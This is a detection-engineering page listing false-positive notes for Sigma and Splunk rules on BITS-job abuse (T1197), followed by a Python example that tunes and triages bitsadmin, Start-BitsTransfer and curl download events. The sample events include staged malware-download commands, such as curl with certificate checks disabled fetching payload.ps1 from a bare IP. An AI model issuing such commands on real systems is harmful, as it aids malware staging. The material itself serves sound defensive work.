LoFP / t1197

| False positive note | Tags |
| --- | --- |
| Administrator PowerShell scripts. | t1078, t1197, windows, sigma |
| Limited false positives will be present. Typically, applications will use `bitsadmin.exe`; any filtering should be based on command-line arguments (to exclude legitimate applications) or on the parent process. | t1197, endpoint, splunk |
| Limited false positives; however, it may be necessary to filter on parent process name or network connection. | t1105, t1197, endpoint, splunk |
| Limited false positives. Administrators may use Start-BitsTransfer for administrative tasks; otherwise, filter on parent process or command-line arguments. | t1197, endpoint, splunk |
| Many legitimate applications or scripts could leverage "bitsadmin". This event is best correlated with EID 16403 via the JobId field. | t1197, windows, sigma |
| Rare programs that use bitsadmin and update from regional TLDs, e.g. .uk or .ca. | t1071, t1071.001, t1197, sigma |
| Some legitimate apps use this, but only a limited number. | t1036, t1036.003, t1197, windows, sigma |
| Some system administrators or development teams may use tools like curl or PowerShell to download files from public services for legitimate automation or scripting purposes. However, use of these binaries to contact domains commonly associated with file sharing or temporary hosting should be carefully reviewed, as such services are frequently abused by threat actors for malware delivery and staging. Tuning by domain allowlisting or internal usage policies is recommended. | t1197, endpoint, splunk |
| This rule does not exclude other known TLDs such as ".org" or ".net". It is recommended to apply additional filters for software and scripts that use the BITS service. | t1197, windows, sigma |
| Usage of these flags to reach public IPs or uncommon destinations should be reviewed. Tuning may be required for domains with known certificate issues. | t1197, endpoint, splunk |
| While the file extensions in question can be suspicious at times, it is best to add filters according to your environment to avoid a large number of false positives. | t1197, windows, sigma |
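The notes above all recommend the same handful of tuning knobs for bitsadmin, Start-BitsTransfer and curl/PowerShell download activity: allowlist by parent process or command line, allowlist destinations by domain, review regional or uncommon TLDs, file-sharing hosts, direct-to-IP downloads, suspicious file extensions and flags that disable certificate checks, and correlate BITS-Client records on JobId (EID 16403). The following Python is an added worked example that applies those filters over constructed events; it is not code from the LoFP page or from any Sigma or Splunk rule. Every path, domain, user, job id, the allowlist contents and the non-16403 event id are assumptions chosen for illustration.

```python
"""Tuning a BITS / download-utility detection with the filters the notes above
recommend. Added example, not the LoFP page's or any rule's own code. Every
path, domain, user, job id and the non-16403 event id below is constructed."""
import re
from collections import defaultdict
from dataclasses import dataclass
from urllib.parse import urlparse

# Environment-specific allowlists: all values are assumptions, replace with your own.
ALLOWED_PARENTS = {r"c:\program files\contoso\updater.exe"}       # hypothetical vendor updater
ALLOWED_CMDLINE = [re.compile(r"/transfer\s+\S+\s+https://updates\.contoso\.example/", re.I)]
ALLOWED_DOMAINS = {"updates.contoso.example"}                     # hypothetical internal update host
FILE_SHARING_DOMAINS = {"tmpfiles.example", "anonshare.example"}  # stand-ins for temp-hosting services
COMMON_TLDS = {"com", "org", "net"}                                # anything else counts as regional/uncommon
SUSPICIOUS_EXT = (".exe", ".dll", ".ps1", ".vbs", ".hta")
INSECURE_FLAGS = re.compile(r"(^|\s)(-k|--insecure|-SkipCertificateCheck)(\s|$)", re.I)
URL_RE = re.compile(r"https?://[^\s\"']+", re.I)
IPV4_RE = re.compile(r"^\d{1,3}(\.\d{1,3}){3}$")

@dataclass(frozen=True)
class ProcEvent:
    image: str     # full path of the created process
    cmdline: str
    parent: str    # full path of the parent process
    user: str

def is_download_utility(ev: ProcEvent) -> bool:
    """bitsadmin.exe, curl.exe, or PowerShell driving BITS / web downloads."""
    image = ev.image.lower().rsplit("\\", 1)[-1]
    cl = ev.cmdline.lower()
    return image in ("bitsadmin.exe", "curl.exe") or "start-bitstransfer" in cl or "invoke-webrequest" in cl

def destination_findings(cmdline: str):
    """Inspect every URL on the command line; return (findings, allowlisted_count)."""
    findings, allowlisted = [], 0
    for url in URL_RE.findall(cmdline):
        parsed = urlparse(url)
        host = (parsed.hostname or "").lower()
        if host in ALLOWED_DOMAINS:          # domain allowlist: skip entirely
            allowlisted += 1
            continue
        tld = host.rsplit(".", 1)[-1]
        if IPV4_RE.match(host):
            findings.append(f"direct-to-IP destination {host}")
        elif host in FILE_SHARING_DOMAINS:
            findings.append(f"file-sharing host {host}")
        elif tld not in COMMON_TLDS:         # regional TLDs such as .uk / .ca land here
            findings.append(f"uncommon TLD .{tld}")
        if parsed.path.lower().endswith(SUSPICIOUS_EXT):
            findings.append(f"suspicious extension on {parsed.path.rsplit('/', 1)[-1]}")
    return findings, allowlisted

def triage(ev: ProcEvent):
    """Return (verdict, reasons): suppress = removed by an allowlist, review = the
    limited-false-positive case an analyst should eyeball, alert = escalate."""
    if not is_download_utility(ev):
        return "ignore", []
    if ev.parent.lower() in ALLOWED_PARENTS:            # parent-process allowlist
        return "suppress", [f"allowlisted parent {ev.parent}"]
    if any(p.search(ev.cmdline) for p in ALLOWED_CMDLINE):  # command-line allowlist
        return "suppress", ["allowlisted command line"]
    reasons, allowlisted = destination_findings(ev.cmdline)
    if INSECURE_FLAGS.search(ev.cmdline):
        reasons.append("certificate validation disabled")
    if reasons:
        return "alert", reasons
    if allowlisted:
        return "suppress", ["all destinations allowlisted"]
    return "review", ["download utility with no allowlist match; check parent and command line"]

def correlate_by_jobid(bits_client_events):
    """Join Microsoft-Windows-Bits-Client records on JobId so an EID 16403 record is
    read next to the other records for the same job (other fields are assumed)."""
    jobs = defaultdict(lambda: {"EventIDs": []})
    for e in bits_client_events:
        job = jobs[e["JobId"]]
        job["EventIDs"].append(e["EventID"])
        for k, v in e.items():
            if k not in ("EventID", "JobId"):
                job.setdefault(k, v)
    return dict(jobs)

# Constructed sample telemetry (not real logs).
SAMPLE_PROCS = [
    ProcEvent(r"C:\Windows\System32\bitsadmin.exe", r"bitsadmin /transfer upd https://updates.contoso.example/pkg.msi C:\ProgramData\pkg.msi", r"C:\Program Files\Contoso\updater.exe", "SYSTEM"),
    ProcEvent(r"C:\Windows\System32\bitsadmin.exe", r"bitsadmin /transfer j1 /download /priority high https://tmpfiles.example/a.exe C:\Users\bob\a.exe", r"C:\Windows\System32\cmd.exe", "CORP\\bob"),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r"powershell -c Start-BitsTransfer -Source http://mirror.pkgs.co.uk/tool.zip -Destination C:\temp\tool.zip", r"C:\Windows\explorer.exe", "CORP\\alice"),
    ProcEvent(r"C:\Windows\System32\bitsadmin.exe", "bitsadmin /list /allusers", r"C:\Windows\System32\cmd.exe", "CORP\\admin"),
    ProcEvent(r"C:\Windows\System32\curl.exe", r"curl.exe -k https://203.0.113.5/payload.ps1 -o C:\temp\p.ps1", r"C:\Windows\System32\cmd.exe", "CORP\\bob"),
    ProcEvent(r"C:\Windows\System32\bitsadmin.exe", r"bitsadmin /addfile upd https://updates.contoso.example/x.cab C:\temp\x.cab", r"C:\Windows\System32\cmd.exe", "CORP\\admin"),
]
JOB = "{0f1e2d3c-1111-2222-3333-444455556666}"   # constructed job id
SAMPLE_BITS_CLIENT = [  # EventID 59 and the Url/JobTitle/Owner fields are assumed; the note names only 16403 and JobId
    {"EventID": 59, "JobId": JOB, "Url": "https://tmpfiles.example/a.exe"},
    {"EventID": 16403, "JobId": JOB, "JobTitle": "j1", "Owner": "CORP\\bob"},
]

if __name__ == "__main__":
    for ev in SAMPLE_PROCS:
        print(triage(ev))
    print(correlate_by_jobid(SAMPLE_BITS_CLIENT))
```

The allowlists are checked before any destination inspection so that the cheap suppressions (known updater parent, known command line) remove the bulk of benign volume; only what survives is scored on destination and flags, and anything left with no finding falls into the "review" bucket the notes describe as the limited-false-positive case rather than being silently dropped.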